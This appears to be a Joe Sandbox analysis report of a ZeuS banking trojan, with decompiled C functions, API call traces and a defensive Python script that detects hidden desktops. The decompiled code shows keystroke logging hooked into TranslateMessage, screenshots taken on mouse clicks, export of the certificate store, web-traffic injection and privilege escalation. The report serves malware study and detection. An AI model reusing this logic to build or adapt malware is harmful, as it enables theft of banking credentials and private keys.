  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Desktop$StationWindow$Thread$CloseCreateOpen$CurrentProcess
  • String ID:
  • API String ID: 2917431391-0
  • Opcode ID: 7d79f859bf9dd606d2cd85d1c4c10853cfd8804d25190d68287e57d553884509
  • Instruction ID: 94968e8d11cd7bbea7c38765d51d2b4a04b2f492b4fdf5cc15547d1058fe178e
  • Opcode Fuzzy Hash: 7d79f859bf9dd606d2cd85d1c4c10853cfd8804d25190d68287e57d553884509
  • Instruction Fuzzy Hash: F72130B5900258BFDF20AFB59C8899F7F7CEB09395B04407AF941B3261D7394D498BA8
Uniqueness

Uniqueness Score: -1.00%
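E0040B9A6 opens (or creates) a window station and a desktop by name and moves the calling thread onto that desktop, which is the hidden-desktop technique that lets a remote-control session run without anything appearing on the victim's screen. The Python below is an added example, not code from the sample or from Joe Sandbox, that enumerates the window stations and desktops of the current session through user32 (EnumWindowStationsW / EnumDesktopsW) and lists the names that fall outside the usual set. The "usual" set (WinSta0 carrying Default, Disconnect and Winlogon; Service-0x0-...$ stations belonging to services) is a triage heuristic, not an exhaustive whitelist, and the station and desktop names in the constructed test data are made up.

```python
"""Triage the window stations and desktops of this session for hidden-desktop residue (Windows only)."""
import ctypes
import sys

WINSTA_ENUMDESKTOPS = 0x0001
KNOWN_DESKTOPS = {"default", "disconnect", "winlogon"}   # normal residents of WinSta0


def is_expected_station(name):
    """WinSta0 and the per-service Service-0x0-<luid>$ stations are the usual residents."""
    low = name.lower()
    return low == "winsta0" or (low.startswith("service-0x") and low.endswith("$"))


def suspicious_entries(stations):
    """Given {station: [desktops]}, return (station, desktop) pairs worth a closer look.

    Heuristic: a station whose name does not match the usual pattern is flagged with all of
    its desktops (None if it has none we could enumerate); on WinSta0 any desktop outside
    KNOWN_DESKTOPS is flagged. Confirm hits by hand; custom software does create desktops."""
    hits = []
    for station, desktops in stations.items():
        if not is_expected_station(station):
            hits.extend((station, d) for d in (desktops or [None]))
        elif station.lower() == "winsta0":
            hits.extend((station, d) for d in desktops if d.lower() not in KNOWN_DESKTOPS)
    return hits


def enumerate_stations():
    """Windows only: map every window station visible to this session to its desktops."""
    from ctypes import wintypes   # imported here so the module also loads on non-Windows hosts
    user32 = ctypes.WinDLL("user32", use_last_error=True)
    ENUMPROC = ctypes.WINFUNCTYPE(wintypes.BOOL, wintypes.LPWSTR, wintypes.LPARAM)
    user32.OpenWindowStationW.restype = wintypes.HWINSTA
    user32.OpenWindowStationW.argtypes = [wintypes.LPCWSTR, wintypes.BOOL, wintypes.DWORD]
    user32.EnumDesktopsW.argtypes = [wintypes.HWINSTA, ENUMPROC, wintypes.LPARAM]
    user32.EnumWindowStationsW.argtypes = [ENUMPROC, wintypes.LPARAM]
    user32.CloseWindowStation.argtypes = [wintypes.HWINSTA]

    result = {}

    def on_station(name, _):
        desktops = result.setdefault(name, [])
        # Only WINSTA_ENUMDESKTOPS is requested, so stations we cannot fully open still get listed
        h = user32.OpenWindowStationW(name, False, WINSTA_ENUMDESKTOPS)
        if h:
            user32.EnumDesktopsW(h, ENUMPROC(lambda d, _: desktops.append(d) or True), 0)
            user32.CloseWindowStation(h)
        return True

    user32.EnumWindowStationsW(ENUMPROC(on_station), 0)
    return result


if __name__ == "__main__" and sys.platform == "win32":
    for station, desktop in suspicious_entries(enumerate_stations()):
        print(f"unexpected: station={station!r} desktop={desktop!r}")
```

EnumWindowStations only sees the caller's session, so run this in the session of the user under investigation (and once as SYSTEM for the service stations); a desktop that the sample created will also disappear when the bot exits, so the check is most useful on a live host.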

C-Code - Quality: 91%
			E00404D51(MSG* _a4) {
				char _v524;
				char _v780;
				char _v840;
				char _v864;
				short _v884;
				intOrPtr* _v888;
				intOrPtr _v900;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t25;
				signed int _t27;
				void* _t35;
				intOrPtr _t38;
				WCHAR* _t44;
				MSG* _t53;
				void* _t56;
				WCHAR* _t65;
				intOrPtr* _t66;
				signed int _t67;
				void* _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x374;
				_t53 = _a4;
				if(_t53 == 0 || E0041CAA4() == 0) {
					L20:
					return TranslateMessage(_t53);
				} else {
					_t25 = _t53->message;
					// 0x201 = WM_LBUTTONDOWN, 0x100 = WM_KEYDOWN, 0x1b = VK_ESCAPE, 8 = VK_BACK; this sits in
					// front of TranslateMessage and records the character each key press translates to
					if(_t25 != 0x201) {
						__eflags = _t25 - 0x100;
						if(_t25 != 0x100) {
							goto L20;
						}
						__eflags = _t53->wParam - 0x1b;
						if(_t53->wParam == 0x1b) {
							goto L20;
						}
						_t27 = GetKeyboardState( &_v780);
						__eflags = _t27;
						if(_t27 == 0) {
							goto L20;
						}
						_t32 = ToUnicode(_t53->wParam, _t53->lParam & 0x000000ff,  &_v780,  &_v884, 9, 0);
						__eflags = _t32;
						if(_t32 <= 0) {
							goto L20;
						}
						__eflags = _t32 - 1;
						if(__eflags != 0) {
							if(__eflags > 0) {
								L18:
								__eflags = 0;
								 *((short*)(_t69 + 0x10 + _t32 * 2)) = 0;
								_t32 =  &_v884;
								_push( &_v884);
								L19:
								E00404BB4(_t32, _t53, _t56);
								goto L20;
							}
							L17:
							__eflags = _v884 - 0x20;
							if(_v884 < 0x20) {
								goto L20;
							}
							goto L18;
						}
						__eflags = _t53->wParam - 8;
						if(_t53->wParam != 8) {
							goto L17;
						}
						_push(0x4015f0);
						goto L19;
					}
					// Left click: while the counter at 0x4223b0 is above zero, decrement it and capture a
					// screenshot (E0040E31C resolves gdiplus/gdi32 as listed under APIs) tagged with GetTickCount
					EnterCriticalSection(0x4223b8);
					if( *0x4223b0 > 0) {
						 *0x4223b0 =  *0x4223b0 + 0xffff;
						_t35 = 2;
						E0040F34A(_t35,  &_v864);
						_t38 = E0040E31C( &_v864, 0x1e, 0x1f4);
						_v900 = _t38;
						if(_t38 != 0) {
							E0040F34A(0,  &_v840);
							_t65 =  &_v884;
							E0040F34A(1, _t65);
							_t44 =  *0x4223a8; // 0x0
							if(_t44 != 0) {
								_t65 = _t44;
							}
							E00405ED9( &_v840, 0x104,  &_v524,  &_v840);
							_t66 = _v888;
							E004187FC(0x104, _t66,  &_v524);
							 *((intOrPtr*)( *_t66 + 8))(_t66, _t65,  *0x423c20, GetTickCount());
						}
					}
					LeaveCriticalSection(0x4223b8);
					goto L20;
				}
			}
Instruction addresses for the listing above (the per-line side column, detached by extraction): 0x00404d57 .. 0x00404eb4

APIs
  • TranslateMessage.USER32(?), ref: 00404EA8
    • Part of subcall function 0041CAA4: WaitForSingleObject.KERNEL32(00000000,0041BE2C,?,19367402,00000001), ref: 0041CAAC
  • EnterCriticalSection.KERNEL32(004223B8), ref: 00404D8B
  • LeaveCriticalSection.KERNEL32(004223B8), ref: 00404E2E
    • Part of subcall function 0040E31C: LoadLibraryA.KERNEL32(gdiplus.dll,?,?,?), ref: 0040E34E
    • Part of subcall function 0040E31C: GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0040E35F
    • Part of subcall function 0040E31C: GetProcAddress.KERNEL32(000001F4,GdiplusShutdown), ref: 0040E36C
    • Part of subcall function 0040E31C: GetProcAddress.KERNEL32(000001F4,GdipCreateBitmapFromHBITMAP), ref: 0040E379
    • Part of subcall function 0040E31C: GetProcAddress.KERNEL32(000001F4,GdipDisposeImage), ref: 0040E386
    • Part of subcall function 0040E31C: GetProcAddress.KERNEL32(000001F4,GdipGetImageEncodersSize), ref: 0040E393
    • Part of subcall function 0040E31C: GetProcAddress.KERNEL32(000001F4,GdipGetImageEncoders), ref: 0040E3A0
    • Part of subcall function 0040E31C: GetProcAddress.KERNEL32(000001F4,GdipSaveImageToStream), ref: 0040E3AD
    • Part of subcall function 0040E31C: LoadLibraryA.KERNEL32(ole32.dll,?,?,?), ref: 0040E3F5
    • Part of subcall function 0040E31C: GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0040E400
    • Part of subcall function 0040E31C: LoadLibraryA.KERNEL32(gdi32.dll,?,?,?), ref: 0040E412
    • Part of subcall function 0040E31C: GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0040E41D
    • Part of subcall function 0040E31C: GetProcAddress.KERNEL32(?,CreateCompatibleDC), ref: 0040E429
    • Part of subcall function 0040E31C: GetProcAddress.KERNEL32(?,CreateCompatibleBitmap), ref: 0040E436
    • Part of subcall function 0040E31C: GetProcAddress.KERNEL32(?,GetDeviceCaps), ref: 0040E443
    • Part of subcall function 0040E31C: GetProcAddress.KERNEL32(?,SelectObject), ref: 0040E450
    • Part of subcall function 0040E31C: GetProcAddress.KERNEL32(?,BitBlt), ref: 0040E45D
    • Part of subcall function 0040E31C: GetProcAddress.KERNEL32(?,DeleteObject), ref: 0040E46A
  • GetTickCount.KERNEL32 ref: 00404DF0
  • GetKeyboardState.USER32(?), ref: 00404E48
  • ToUnicode.USER32 ref: 00404E70
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: AddressProc$LibraryLoad$CriticalSection$CountEnterKeyboardLeaveMessageObjectSingleStateTickTranslateUnicodeWait
  • String ID:
  • API String ID: 2762424063-3916222277
  • Opcode ID: f3d60c0252848b96bc04d91314d3452e3f382f709f86b6276cc2b71142d8ee13
  • Instruction ID: f1c36725eb23df81f5d096a4e7f3a53ad00f63c72dd25c4c5539de831bcf4255
  • Opcode Fuzzy Hash: f3d60c0252848b96bc04d91314d3452e3f382f709f86b6276cc2b71142d8ee13
  • Instruction Fuzzy Hash: 2631AFB1600301ABDB20DF65DD49AAB77A8BF80310F44083BBA44F71E2D77CE85587A9
Uniqueness

Uniqueness Score: -1.00%

APIs
  • CertOpenSystemStoreW.CRYPT32(00000000,004034D0), ref: 0040D000
  • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 0040D01C
  • CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 0040D028
  • PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 0040D067
  • PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 0040D097
  • CharLowerW.USER32 ref: 0040D0B5
  • GetSystemTime.KERNEL32(?), ref: 0040D0C0
  • CertCloseStore.CRYPT32(?,00000000), ref: 0040D149
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: CertStore$CertificatesEnumExportSystem$CharCloseLowerOpenTime
  • String ID:
  • API String ID: 3751268071-0
  • Opcode ID: 13d8489a60e86b5637ab60145fc7bf5d324d6fde8ab81665ae8597e3fc872d5f
  • Instruction ID: a9ca8741f4bc0d47863dfe22358d7945faba45ea9f07a6df6917e6a0e2337ce6
  • Opcode Fuzzy Hash: 13d8489a60e86b5637ab60145fc7bf5d324d6fde8ab81665ae8597e3fc872d5f
  • Instruction Fuzzy Hash: 1341A771608341ABD7119FA5CD40A6BBBDCEB88348F00093FB9C4F61D0DA38D9498766
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 96%
			E00412174(char __eax, void* __ecx, char* _a4, intOrPtr* _a8, signed int* _a12) {
				char _v540;
				char _v800;
				char _v804;
				char _v860;
				struct _SYSTEMTIME _v876;
				char _v900;
				signed int _v968;
				signed int _v980;
				intOrPtr _v984;
				intOrPtr _v988;
				char* _v992;
				char _v996;
				void* _v1008;
				struct _SYSTEMTIME _v1028;
				signed int _v1032;
				short _v1036;
				signed short* _v1040;
				signed int _v1044;
				intOrPtr* _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				char _v1068;
				intOrPtr _v1072;
				char _v1076;
				intOrPtr _v1080;
				intOrPtr _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t158;
				signed int _t159;
				intOrPtr _t160;
				signed int _t168;
				void* _t188;
				void* _t199;
				signed int _t211;
				signed int _t215;
				signed int _t218;
				signed char _t222;
				signed int _t224;
				void* _t227;
				void* _t228;
				signed int _t229;
				signed int _t230;
				signed int _t240;
				void* _t242;
				signed int _t250;
				intOrPtr* _t254;
				signed int _t255;
				intOrPtr _t258;
				short* _t261;
				void* _t280;
				intOrPtr* _t286;
				signed int _t291;
				long _t294;
				signed short* _t296;
				signed short* _t298;
				signed int _t301;
				intOrPtr* _t303;
				signed int _t307;
				void* _t309;

				_t309 = (_t307 & 0xfffffff8) - 0x424;
				_v1032 = _v1032 & 0x00000000;
				if(__eax == 0) {
					L52:
					asm("sbb eax, eax");
					return  ~0x00000000;
				} else {
					_t286 = __ecx + 0x10;
					_v1048 = _t286;
					_v1028.wDayOfWeek = __eax;
					do {
						_t258 =  *_t286;
						_t279 =  *(_t286 - 0x10) >> 0x0000000a & 0x00000008;
						_v1028.wHour = _t279;
						if(_t258 == 0) {
							_t254 = _a8;
							L6:
							_t259 =  *(_t286 + 4);
							_v1052 = _v1052 & 0x00000000;
							_v1064 = _v1064 & 0x00000000;
							_t158 =  *((intOrPtr*)(_t286 + 8)) + _t259;
							_v1028.wSecond = _t158;
							if(_t259 >= _t158) {
								L35:
								_t159 =  *(_t286 - 0x10);
								_t294 = 0;
								if((_t159 & 0x00000008) != 0 && _v1052 != 0) {
									if((_t159 & 0x00000200) == 0) {
										_t255 = E00405426(_t159 | 0xffffffff, 0, _a4);
										__eflags = _t255;
										if(_t255 != 0) {
											_t188 = 9;
											E0040F34A(_t188,  &_v996);
											_push(_v1052);
											E00418864(_t259, _t279, __eflags, 0xc9, _t255, 0,  &_v996, _t255);
											_t309 = _t309 + 0x18;
											E004051E6(_t255);
										}
									} else {
										_t280 = 0x3c;
										E00405299( &_v996,  &_v996, 0, _t280);
										_v992 =  &_v800;
										_v1008 = _t280;
										_v988 = 0x103;
										if(InternetCrackUrlA(_a4, 0, 0,  &_v1008) == 1 && _v992 > 0) {
											GetSystemTime( &_v1028);
											_t306 =  &_v876;
											_t199 = 8;
											E0040F34A(_t199,  &_v876);
											_push(_v1028.wDay & 0x0000ffff);
											_push(_v1028.wMonth & 0x0000ffff);
											_push((_v1028.wYear & 0x0000ffff) - 0x7d0);
											_push( &_v804);
											E00405ED9( &_v876, 0x104,  &_v540, _t306);
											_t309 = _t309 + 0x14;
											E004186BA(_t259, 0x104, 2, 0,  &_v540, _v1068, _v1080);
											_t286 = _v1084;
										}
									}
									E004051E6(_v1052);
									_t294 = 0;
								}
								if( *((intOrPtr*)(_t286 - 4)) != _t294) {
									if(( *(_t286 - 0x10) & 0x00000010) == 0) {
										EnterCriticalSection(0x4233fc);
										E004051E6( *0x423414);
										_t168 = E00405644(E004051E6( *0x423418) | 0xffffffff,  *((intOrPtr*)(_t286 - 0xc)));
										 *0x423414 = _t168;
										__eflags = _t168 | 0xffffffff;
										 *0x423418 = E00405644(_t168 | 0xffffffff,  *((intOrPtr*)(_t286 - 4)));
										LeaveCriticalSection(0x4233fc);
										goto L51;
									}
									E0041CD2B( &_v860, _t259, 1,  &_v996);
									if(E0040648B( &_v900,  *((intOrPtr*)(_t286 - 4)), E00405D23( *((intOrPtr*)(_t286 - 4)))) == 0) {
										goto L51;
									}
									_t261 =  &_v860;
									do {
										E0040554E( *((intOrPtr*)(_t309 + _t294 + 0xb8)), _t261);
										_t294 = _t294 + 1;
										_t261 = _t261 + 4;
									} while (_t294 < 0x10);
									 *_t261 = 0;
									GetLocalTime( &_v876);
									E00409465(_t261,  &_v996,  &_v860, 3,  &_v876, 0x10);
								}
								goto L51;
							} else {
								goto L9;
								L13:
								_t279 =  *_t211 & 0x0000ffff;
								if(_t279 != 4) {
									_t259 = _t211 + 4;
									_t218 = E0041149A(_v1028.wHour, _t211 + 4, 0,  &_v1056, _t279 - 4,  *_t254 + _v1060,  *_a12 - _v1060);
									__eflags = _t218;
									if(_t218 == 0) {
										L33:
										if(_v1028.wYear < _v1028.wSecond) {
											_t259 = _v1028.wYear;
											L9:
											_t211 = ( *_t259 & 0x0000ffff) + _t259;
											_t296 = ( *_t211 & 0x0000ffff) + _t211;
											_v1028.wYear = _t296 + ( *_t296 & 0x0000ffff);
											_t279 =  *_t259 & 0x0000ffff;
											_v1036 = _t259;
											_v1044 = _t211;
											_v1040 = _t296;
											if(( *_t259 & 0x0000ffff) != 4) {
												goto L11;
											} else {
												_v1060 = _v1060 & 0x00000000;
												goto L13;
											}
										}
										_t286 = _v1048;
										goto L35;
									}
									__eflags =  *_v1036 - 4;
									_t298 = _v1040;
									if( *_v1036 != 4) {
										_t54 =  &_v1056;
										 *_t54 = _v1056 + _v1060;
										__eflags =  *_t54;
									} else {
										_v1060 = _v1056;
									}
									L22:
									_t259 = _v1056 - _v1060;
									_t222 =  *(_v1048 - 0x10);
									_t291 = ( *_t298 & 0x0000ffff) - 4;
									_v1044 = _t259;
									if((_t222 & 0x00000004) == 0) {
										__eflags = _t222 & 0x00000008;
										if((_t222 & 0x00000008) != 0) {
											_t224 = E00405171(_t259 + _t291 + _v1064 + 2,  &_v1052);
											__eflags = _t224;
											if(_t224 != 0) {
												_t301 = _v1052;
												__eflags = _t291;
												if(_t291 != 0) {
													E00405222(_v1064 + _t301,  &(_v1040[2]), _t291);
													_t84 =  &_v1076;
													 *_t84 = _v1076 + _t291;
													__eflags =  *_t84;
												}
												_t279 = _v1044;
												_t227 = E00405222(_v1064 + _t301,  *_t254 + _v1060, _t279);
												_t259 = _v1060;
												__eflags =  *(_t259 - 0x10) & 0x00000100;
												if(( *(_t259 - 0x10) & 0x00000100) == 0) {
													_t228 = E00409E13(_t227, _t279);
													_t95 =  &_v1068;
													 *_t95 = _v1068 + _t228;
													__eflags =  *_t95;
													_t254 = _a8;
												} else {
													_v1064 = _v1064 + _t279;
												}
												_t229 = _v1064;
												 *((char*)(_t229 + _t301)) = 0xa;
												_t230 = _t229 + 1;
												__eflags = _t230;
												_v1064 = _t230;
												 *((char*)(_t230 + _t301)) = 0;
											}
										}
									} else {
										_v1036 =  *_a12 - _t259 + _t291;
										_t240 = E004051B6( *_a12 - _t259 + _t291);
										_v1044 = _t240;
										if(_t240 != 0) {
											_t279 = _v1060;
											_t242 = E00405222(E00405222(_t240,  *_t254, _v1060) + _v1060,  &(_t298[2]), _t291);
											_t303 = _a12;
											_t259 =  *_t254 + _v1080;
											E00405222(_t242 + _t291 + _v1060,  *_t254 + _v1080,  *_t303 - _v1080);
											E004051E6( *_t254);
											_v1072 = _v1072 + 1;
											 *_t254 = _v1084;
											 *_t303 = _v1076;
										}
									}
									goto L33;
								}
								if( *_t259 != _t279) {
									_t250 = _v1060;
								} else {
									_t250 =  *_a12;
								}
								_v1056 = _t250;
								goto L22;
								L11:
								_t215 = E0041149A(_v1028.wHour, _t259,  &_v1060, 0, _t279 - 4,  *_t254,  *_a12);
								__eflags = _t215;
								if(_t215 == 0) {
									goto L33;
								}
								_t298 = _v1040;
								_t211 = _v1044;
								_t259 = _v1036;
								goto L13;
							}
						}
						_v996 = 0x2a3f;
						_v992 = _t258;
						_t160 = E00405D23(_t258);
						_t254 = _a8;
						_v988 = _t160;
						_v984 =  *_t254;
						_t279 = _t279 | 0x00000012;
						_v980 =  *_a12;
						_v968 = _t279;
						if(E0040616A( &_v996) != 0) {
							goto L6;
						}
						L51:
						_t286 = _t286 + 0x1c;
						_t150 =  &(_v1028.wDayOfWeek);
						 *_t150 = _v1028.wDayOfWeek - 1;
						_v1048 = _t286;
					} while ( *_t150 != 0);
					goto L52;
				}
			}

Instruction addresses covered by this listing: 0x0041217a to 0x00412625

APIs
  • InternetCrackUrlA.WININET(?,?,?,00000000), ref: 0041245D
  • GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 0041247B
  • GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?,-004233F0,?,?), ref: 00412595
  • EnterCriticalSection.KERNEL32(004233FC,-004233F0,?,?), ref: 004125C1
  • LeaveCriticalSection.KERNEL32(004233FC,?,?), ref: 004125FE
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: CriticalSectionTime$CrackEnterInternetLeaveLocalSystem
  • String ID: ?*
  • API String ID: 2400141425-3267162389
  • Opcode ID: ff006e4c8d9e38cf2f77b5d03895a51913193254b6d0c3d64b140312574f7554
  • Instruction ID: 47e0c72d8f6fc820f90c99b4c3c67a230007a10c331b6f7aa76d0301b9cc1d03
  • Opcode Fuzzy Hash: ff006e4c8d9e38cf2f77b5d03895a51913193254b6d0c3d64b140312574f7554
  • Instruction Fuzzy Hash: CFE17871508301AFC710DF69C980AABB7E5FF88318F00492EF895E7291D778E955CB6A
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 89%
			E0040A91B(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, signed char _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, long _a24, long _a28) {
				short _v524;
				struct _WIN32_FIND_DATAW _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				void* _v1128;
				int _t51;
				signed int _t60;
				long _t68;
				signed char _t71;
				signed int _t83;

				_v1120 = __edx;
				_v1124 = __ecx;
				_t51 = E0040AA77("*",  &_v524, __ecx);
				if(_t51 == 0) {
					L25:
					return _t51;
				}
				_t51 = FindFirstFileW( &_v524,  &_v1116);
				_v1128 = _t51;
				if(_t51 != 0xffffffff) {
					_t71 = _a8;
					while(1) {
						_t83 = 0;
						if(_a20 != 0 && WaitForSingleObject(_a20, 0) != 0x102) {
							break;
						}
						if(E0040A677( &(_v1116.cFileName)) != 0) {
							L23:
							if(FindNextFileW(_v1128,  &_v1116) != 0) {
								continue;
							}
							break;
						}
						_t60 = _v1116.dwFileAttributes & 0x00000010;
						if(_t60 == 0 || (_t71 & 0x00000002) == 0) {
							if(_t60 != _t83 || (_t71 & 0x00000004) == 0) {
								goto L17;
							} else {
								goto L10;
							}
						} else {
							L10:
							if(_a4 <= _t83) {
								L17:
								if((_v1116.dwFileAttributes & 0x00000010) != 0 && (_t71 & 0x00000001) != 0 && E0040AA77( &(_v1116.cFileName),  &_v524, _v1124) != 0) {
									_t103 = _a24;
									if(_a24 != 0) {
										Sleep(_a24);
									}
									E0040A91B( &_v524, _v1120, _t103, _a4, _t71, _a12, _a16, _a20, _a24, _a28);
								}
								goto L23;
							}
							while(PathMatchSpecW( &(_v1116.cFileName),  *(_v1120 + _t83 * 4)) == 0) {
								_t83 = _t83 + 1;
								if(_t83 < _a4) {
									continue;
								}
								goto L17;
							}
							_t68 = _a12(_a16);
							__eflags = _t68;
							if(_t68 == 0) {
								break;
							}
							__eflags = _a28;
							if(_a28 != 0) {
								Sleep(_a28);
							}
							goto L17;
						}
					}
					_t51 = FindClose(_v1128);
				}
			}

Instruction addresses covered by this listing: 0x0040a938 to 0x0040aa74

APIs
    • Part of subcall function 0040AA77: PathCombineW.SHLWAPI(0041C3C7,0041C3C7,?,0041C3C7,?,?), ref: 0040AA96
  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040A95A
  • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040A981
  • PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0040A9CB
  • Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 0040A9F8
  • Sleep.KERNEL32(00000000,?,?), ref: 0040AA28
  • FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0040AA56
  • FindClose.KERNEL32(?,?,?,?,00000000), ref: 0040AA68
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
  • String ID:
  • API String ID: 2348139788-0
  • Opcode ID: b1dcf7820d8df5e7ab2b5d9487a7abef7fa89d02134b19c5f361703a734a28c2
  • Instruction ID: ed2645ebbb87d90eca358f0690877814f502cc3c3a9a4f824e661dffbb9f6bcd
  • Opcode Fuzzy Hash: b1dcf7820d8df5e7ab2b5d9487a7abef7fa89d02134b19c5f361703a734a28c2
  • Instruction Fuzzy Hash: FA4180712043069BCB21DF14CD44ADF7BA5EF44384F05493AF895A22E1D339C9A5DF9A
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E004068B2(WCHAR* _a4) {
				void* _v12;
				intOrPtr _v16;
				struct _TOKEN_PRIVILEGES _v28;
				int _t23;

				_t23 = 0;
				if(OpenThreadToken(GetCurrentThread(), 0x20, 0,  &_v12) != 0 || OpenProcessToken(0xffffffff, 0x20,  &_v12) != 0) {
					_v28.PrivilegeCount = 1;
					_v16 = 2;
					if(LookupPrivilegeValueW(_t23, _a4,  &(_v28.Privileges)) != 0 && AdjustTokenPrivileges(_v12, _t23,  &_v28, _t23, _t23, _t23) != 0 && GetLastError() == 0) {
						_t23 = 1;
					}
					CloseHandle(_v12);
					return _t23;
				} else {
					return 0;
				}
			}

Instruction addresses covered by this listing: 0x004068bd to 0x0040692d

APIs
  • GetCurrentThread.KERNEL32 ref: 004068C2
  • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040C177,SeTcbPrivilege), ref: 004068C9
  • OpenProcessToken.ADVAPI32(000000FF,00000020,0040C177,?,?,?,?,0040C177,SeTcbPrivilege), ref: 004068DB
  • LookupPrivilegeValueW.ADVAPI32(00000000,0040C177,?), ref: 004068FF
  • AdjustTokenPrivileges.ADVAPI32(0040C177,00000000,00000001,00000000,00000000,00000000), ref: 00406914
  • GetLastError.KERNEL32 ref: 0040691E
  • CloseHandle.KERNEL32(0040C177), ref: 0040692D
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Token$OpenThread$AdjustCloseCurrentErrorHandleLastLookupPrivilegePrivilegesProcessValue
  • String ID:
  • API String ID: 2724707430-0
  • Opcode ID: bff099fbe7444e0be16baf7303fa87e618fc1c4cb14979851ef0f0df6a3b5267
  • Instruction ID: c92560ec7cb180530b72f99183430393ff3ba2c87d00fb0c43f3b7c83159b759
  • Opcode Fuzzy Hash: bff099fbe7444e0be16baf7303fa87e618fc1c4cb14979851ef0f0df6a3b5267
  • Instruction Fuzzy Hash: 2F010CB2600209BFEB109FA5DD89EEF7BBCEB15349F004076F506F11A0E77589949A39
Uniqueness

Uniqueness Score: -1.00%

APIs
  • CryptAcquireContextW.ADVAPI32(0040AABE,00000000,00000000,00000001,F0000040,00000000,0040AABE,?,00000030,?,?,?,0040AFD7,?), ref: 004064A4
  • CryptCreateHash.ADVAPI32(00008003,00008003,00000000,00000000,?,?,?,0040AFD7,?), ref: 004064BC
  • CryptHashData.ADVAPI32(?,00000010), ref: 004064D8
  • CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 004064F0
  • CryptDestroyHash.ADVAPI32(?), ref: 00406507
  • CryptReleaseContext.ADVAPI32(?,00000000,?,?,0040AFD7,?), ref: 00406511
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamRelease
  • String ID:
  • API String ID: 3186506766-0
